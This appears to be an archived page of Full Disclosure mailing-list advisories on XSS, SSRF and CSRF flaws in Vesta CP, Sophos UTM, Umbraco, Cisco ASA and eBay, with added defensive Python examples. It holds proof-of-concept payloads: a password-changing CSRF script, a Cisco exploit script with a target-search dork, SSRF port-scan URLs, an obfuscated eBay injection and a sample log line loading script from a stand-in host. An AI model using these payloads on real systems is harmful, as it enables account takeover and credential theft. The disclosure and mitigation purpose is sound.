[FD] Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability

2016-02-18 Thread Necmettin COŞKUN
# Exploit Title     :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
# Vendor Homepage   :http://www.vestacp.com
# Version           :0.9.8-15
# Exploit Author    :Necmettin COSKUN @babayarisi 
# Blog              :http://ha.cker.io
# Discovery date    :16/02/2016
# Tested on         :Fedora23 - Chrome/Firefox/Maxthon

We can use user-agent information to attack websites like this.
First of all, we change our user-agent and add some dangerous JavaScript code
(XSS etc.), and then we make a request to one of the websites on the target
server, so it is saved in access.log by the server; when the Administrator
reads it, the JavaScript code that we added to our user-agent information runs.

PoC Exploit

1. Prepare evil js file

function csrfWithToken(url,hanimisToken,password){
  $.get(url, function(gelen) {
    $('body').append($(gelen));
    $('form[id="vstobjects"]').css("display","none");
    var token = $(hanimisToken).attr("token");
    $('form[id="vstobjects"]').attr("action",url);
    $('input[name="v_password"]').val(password);
    $('form[id="vstobjects"]').submit();
  });
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");

2. Make a GET request with the evil user-agent to the victim server

wget --header="Accept: text/html" --user-agent="" http://victimserver

3. We wait for the Administrator to read the access.log into which our evil.js was injected
4. We log in to VestaCP with the password we changed
http(s)://victim:8083/
  
  
Discovered by:

Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
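The defender-side counterpart to the log-injection described in the post above, added here as an example (it is not part of the advisory and not Vesta's own code): parse Apache/nginx combined-format access log lines, HTML-escape every field before a web log viewer renders it, and flag User-Agent values that carry markup. The two log lines are constructed for the example; the field layout follows the standard combined format.

```python
import html
import re

# Apache/nginx "combined" log format; the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines: one benign, one carrying markup in the User-Agent.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Feb/2016:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [16/Feb/2016:10:00:02 +0000] "GET /index HTTP/1.1" 200 512 "-" "<script src=//evil.example/x.js></script>"',
]

# Tag openers, javascript: URLs and inline event handlers have no business in a User-Agent.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|javascript:|on[a-z]+\s*=', re.IGNORECASE)


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def suspicious_agent(agent):
    """True when a User-Agent value contains HTML tags, a javascript: URL or an event handler."""
    return MARKUP_RE.search(agent) is not None


def render_log_html(lines):
    """Render log lines as an HTML table. Every field goes through html.escape()
    so content that an attacker wrote into the log cannot become markup in the viewer."""
    rows = []
    for line in lines:
        fields = parse_combined(line)
        if fields is None:
            # Unparseable line: still escape it rather than drop it silently.
            rows.append('<tr><td colspan="4">%s</td></tr>' % html.escape(line))
            continue
        rows.append("<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % (
            html.escape(fields["ip"]),
            html.escape(fields["request"]),
            html.escape(fields["status"]),
            html.escape(fields["agent"]),
        ))
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def flag_suspicious(lines):
    """Return (ip, agent) pairs whose User-Agent looks like an injection attempt."""
    hits = []
    for line in lines:
        fields = parse_combined(line)
        if fields and suspicious_agent(fields["agent"]):
            hits.append((fields["ip"], fields["agent"]))
    return hits


if __name__ == "__main__":
    print(render_log_html(SAMPLE_LOG))
    for ip, agent in flag_suspicious(SAMPLE_LOG):
        print("suspicious User-Agent from %s: %r" % (ip, agent))
```

Escaping at render time is the fix that removes the bug class; the MARKUP_RE check is a cheap detection signal for log review and will produce occasional false positives, so treat it as a triage hint rather than a block rule.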

[FD] CVE-2016-2046 Cross Site Scripting in Sophos UTM 9

2016-02-18 Thread Mike Lisi
---
Vendor:
---
Sophos (https://www.sophos.com)

---
Affected Products/Versions:
---
Product: Sophos UTM 9
Version: 9.350-12 with pattern version 92405 (potentially lower)


---
Description:
---

Title: Cross-site Scripting (XSS) in Sophos UTM 9
CVE: CVE-2016-2046
Researcher: Mike Lisi - HALOCK Security Labs (@MikeHacksThings)

A cross-site scripting vulnerability exists in Sophos UTM 9.350-12 with pattern 
version 92405 that allows attackers to craft a hyperlink that contains a 
reflected XSS payload via the ‘lang’ parameter. If visited by the targeted 
user, the XSS payload gets stored in a local cookie variable which is 
re-executed whenever the UserPortal landing page is visited. By not properly 
sanitizing the language selection parameter, an attacker can inject arbitrary 
JavaScript or modify page contents by injecting remote HTML content. This does 
not require that the user be authenticated to the application.

Typically this would all be considered Reflected XSS, however, once one of the 
PoC links is visited by the targeted user, the data passed via the ‘lang’ 
parameter is stored in a local cookie file named ‘eup_force_lang’ on the user’s 
machine. Once the cookie is set, the user no longer needs to visit the 
malicious crafted links discussed before. The cookie data is injected into the 
page automatically. This persists until the cookie is cleared from the browser.

---
POC - Authentication not required:
---
https://XXX.XXX.XXX.XXX/?lang=english";alert('xss');//

---
Solution:
---
UTM 9.353 was officially announced and released on January 28, 2016 which 
includes a fix to address this vulnerability.


---
Reference:
---

CVE-2016-2046
https://blogs.sophos.com/2016/01/28/utm-up2date-9-353-released/
http://www.halock.com/blog/cve-2016-2046-cross-site-scripting-sophos-utm-9/

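An added example of how the language-selection input in the advisory above should have been handled; it is not Sophos code and the page does not show the portal's real implementation. The PoC's `english";alert('xss');//` shape implies the value lands inside a quoted JavaScript string, so the example assumes that context, an allowlist of language codes (constructed here; the real codes are not on the page), and that the same validation runs on both the query parameter and the stored cookie value. The variable name `eup_force_lang` is borrowed from the cookie name in the advisory.

```python
import json

# Constructed allowlist; the real UTM portal's language codes are not on the page.
SUPPORTED_LANGUAGES = ("english", "german", "french")
DEFAULT_LANGUAGE = "english"


def select_language(requested, supported=SUPPORTED_LANGUAGES, default=DEFAULT_LANGUAGE):
    """Map an untrusted value (query parameter or cookie) to an allowlisted language.
    Anything that is not exactly one of the supported codes falls back to the default,
    so a value like  english";alert('xss');//  never reaches the page. Apply this on
    the cookie read path too: a value that was stored earlier is still untrusted."""
    if isinstance(requested, str) and requested in supported:
        return requested
    return default


def js_string_literal(value):
    """Encode a Python string as a JavaScript string literal that is safe inside an
    inline <script>. json.dumps escapes quotes and backslashes; the extra replacements
    stop '</script>' and HTML comment markers from ending the script block early."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_lang_script(requested):
    """Safe rendering: allowlist first, then a proper JS literal (defence in depth)."""
    lang = select_language(requested)
    return "<script>var eup_force_lang = %s;</script>" % js_string_literal(lang)


def render_lang_script_unsafe(requested):
    """The pattern the advisory describes: raw interpolation of the parameter into a
    quoted JS string. Kept only to contrast with render_lang_script."""
    return '<script>var eup_force_lang = "%s";</script>' % requested
```

The allowlist alone would have stopped this bug; the literal encoder covers the case where a future code path needs to embed a free-form value and someone forgets the allowlist.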

[FD] Umbraco - The open source ASP.NET CMS Multiple Vulnerabilities

2016-02-18 Thread Sandeep Kamble
[image: Vulnerable Umbraco]


Recently I got an assignment where I had to work on the Umbraco application,
a free open source Content Management System built on the ASP.NET platform
and used by more than 225,000 websites. While performing security testing of
this application, I discovered serious vulnerabilities within it that allow an
attacker to perform an SSRF attack, a CSRF bypass attack, and persistent XSS.
CVE numbers are yet to be assigned to these vulnerabilities. It is strongly
recommended to update the CMS to the latest version.

*SSRF Vulnerability*

Let me start with the Server Side Request Forgery (SSRF) attack found
within feedproxy.aspx. Those who are new to SSRF, please follow this link.


I started off playing with feedproxy.aspx; it is an interesting page in
Umbraco. feedproxy.aspx is used to access external resources using the
url GET parameter.

http://local/Umbraco/feedproxy.aspx?url=http://bobsite/index

Once you change the URL to
http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you are
able to access the localhost application on the server.

Using this payload, change the port number to perform port scanning of the
server. It will be helpful to find more details about the server.
For example:

http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:25/index
http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:8080/index

If the port number is closed, you will find an error message on the
feedproxy.aspx page. Umbraco assigned bug ID U4-7457 and fixed the issue.

*CSRF Bypass Vulnerability*

Umbraco assigned bug ID U4-7459. It was discovered that sensitive actions in
Umbraco, such as editing a user's account information, were vulnerable to CSRF.
The vulnerable code in templates.asmx.cs, on line number 75, executes the save
operation without verifying the actual CSRF token.
In the file SetAngularAntiForgeryTokensAttributes.cs, on line number 25, the
function allows an empty CSRF value, which is what triggers the CSRF vulnerability.

Find more details on this fix at the link below:

https://github.com/umbraco/Umbraco-CMS/commit/18c3345e47663a358a042652e697b988d6a380eb

*Persistent XSS Vulnerability*

It was found that Umbraco is also vulnerable to persistent XSS in the content
type editor. Umbraco assigned bug ID U4-7461. This vulnerability existed in
the name field of the media page, the developer data edit page, and the form
page.

[image: XSS Vulnerability in Umbraco]


[image: XSS Vulnerability in Umbraco]


[image: XSS Vulnerability Umbraco]


To mitigate these vulnerabilities, it is recommended to update Umbraco to
version 7.4.0.

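Two server-side checks that address the SSRF and the CSRF findings in the post above, written here as an added example; this is not Umbraco's code and not the fix in the linked commit. For a fetch-proxy like feedproxy.aspx, `classify_fetch_target` refuses any URL whose scheme is not HTTP(S), that carries credentials, or that points (directly or after name resolution) at a non-public address, which covers the `127.0.0.1:<port>` probing described. For the anti-forgery check, `csrf_token_valid` rejects an empty submitted token before comparing, which is the gap described for SetAngularAntiForgeryTokensAttributes.cs. The `resolver` argument is an assumption of this example so the check can be tested without DNS.

```python
import hmac
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _resolve(host):
    """Default resolver: every address the name resolves to (IPv4 and IPv6)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def classify_fetch_target(url, resolver=_resolve):
    """Return (allowed, reason) for a URL a server-side proxy has been asked to fetch.
    Rejects non-HTTP schemes, embedded credentials, and any address that is not
    globally routable (loopback, RFC 1918, link-local, multicast, reserved)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        # IP literal in the URL: no lookup needed.
        addresses = {ipaddress.ip_address(host)}
    except ValueError:
        try:
            addresses = {ipaddress.ip_address(a) for a in resolver(host)}
        except Exception:
            # Any resolution failure is treated as a refusal (fail closed).
            return False, "host %r does not resolve" % host
    for addr in addresses:
        if (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
            return False, "%s is not a public address" % addr
    return True, "ok"


def csrf_token_valid(expected, submitted):
    """Accept a request only when a non-empty token was issued for the session and
    the submitted token matches it. An empty or missing submitted value is rejected
    outright, so a blank token can never pass the comparison."""
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)
```

Two caveats: a name that resolves to a public address at check time can be re-pointed at an internal one before the fetch (DNS rebinding), so the proxy should connect to the address it validated rather than resolving again; and HTTP redirects from the fetched resource need the same check applied to each hop.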


[FD] Cisco ASA VPN - Zero Day Exploit

2016-02-18 Thread Juan Sacco
# Exploit author: Juan Sacco - jsa...@exploitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to a XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other users'
# credentials.
# The password recovery form fails to filter properly the hidden input
# fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT report a CVE Feb 15/2016
# Exploit Pack disclose the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here:
# https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import string, sys
import socket, httplib
import telnetlib

def run():
    try:
        Target = sys.argv[1]
        Port = int(sys.argv[2])
        # Here goes your custom JS agent code
        Payload = "alert(1)"
        VulnerableURL = (
            "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
            + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_")
        CraftedRequest = VulnerableURL
        # Start the connection (the port given on the command line is used here)
        connection = httplib.HTTPSConnection(Target, Port)
        connection.request('GET', CraftedRequest)
        Response = connection.getresponse()
        print "Server status response:", Response.status, Response.reason
        data = Response.read()
        vulnerable = "Target is not vulnerable"
        # Look for the unescaped username reflected inside the hidden input
        for line in str(data).splitlines():
            if "juansacco\\\"" in line:
                vulnerable = "Target is vulnerable"
        if vulnerable != "Not vulnerable":
            print "Result of the test:", vulnerable
        # Find the injection on the response
        connection.close()
    except Exception, e:
        print "Exploit connection closed " + str(e)

if __name__ == '__main__':
    print "Cisco VPN ASA Exploit - Zero Day"
    print ""
    print "Author: Juan Sacco - jsa...@exploitpack.com"

    try:
        Target = sys.argv[1]
        Port = sys.argv[2]
    except IndexError:
        pass
    run()

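The bug class in the post above is a request parameter echoed into a hidden input's `value` attribute without attribute escaping. The following is an added example, not Cisco's code and not the author's script: it renders the hidden input both the vulnerable way and the hardened way (`html.escape(..., quote=True)`), then parses the result with the standard-library HTML parser to show whether the value created attributes it should not have. The payload is constructed from the URL-decoded shape of the `username` parameter in the script above, and the input name `username` is assumed.

```python
import html
from html.parser import HTMLParser


class InputAttrCollector(HTMLParser):
    """Collects the attributes of every <input> tag, roughly the way a browser
    tokenizes them; used to check whether a rendered value created extra attributes."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def render_hidden_unsafe(name, value):
    """The pattern the advisory describes: a request parameter echoed straight
    into a hidden input's value attribute with no escaping."""
    return '<input type="hidden" name="%s" value="%s">' % (name, value)


def render_hidden_safe(name, value):
    """Same markup with html.escape(quote=True): the quote that would close the
    attribute becomes &quot;, so the value can never end the attribute early."""
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def parse_inputs(markup):
    """Attribute dictionaries of all <input> tags in the markup."""
    p = InputAttrCollector()
    p.feed(markup)
    p.close()
    return p.inputs


def injected_attributes(markup, expected=("type", "name", "value")):
    """Names of attributes on the rendered input beyond the expected ones.
    A non-empty result means the value broke out of its attribute."""
    extra = []
    for attrs in parse_inputs(markup):
        extra.extend(sorted(a for a in attrs if a not in expected))
    return extra


if __name__ == "__main__":
    # Constructed from the URL-decoded username parameter in the advisory's request.
    payload = 'juansacco" accesskey=X onclick=alert(1) sacco'
    for label, markup in (("unsafe", render_hidden_unsafe("username", payload)),
                          ("safe", render_hidden_safe("username", payload))):
        print(label, "->", markup)
        print("  extra attributes:", injected_attributes(markup))
```

The parser-based check is also a handy regression test: render a form with a quote-bearing value and assert that only the expected attributes come back.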


[FD] EBAY Bugbounty: Persistent DOM Based XSS on ebay.com

2016-02-18 Thread Alexander Korznikov
Hello all,

Description: Persistent DOM based Cross Site Scripting on ebay.com domain.
Disclosed to Ebay: January 2015
Fixed: February 2016
Vulnerability location: Every listing
Who are able to create: Sellers

Same origin policy bypass via postMessage

Write-up:
http://www.korznikov.com/2016/02/persistent-stored-dom-xss-on-ebaycom.html

Proof of Concept:

This code is inserted into the listing to pop up an alert on the ebay.com domain.


window.onload = function() {
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.text = atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7");
    document.body.appendChild(s);
}

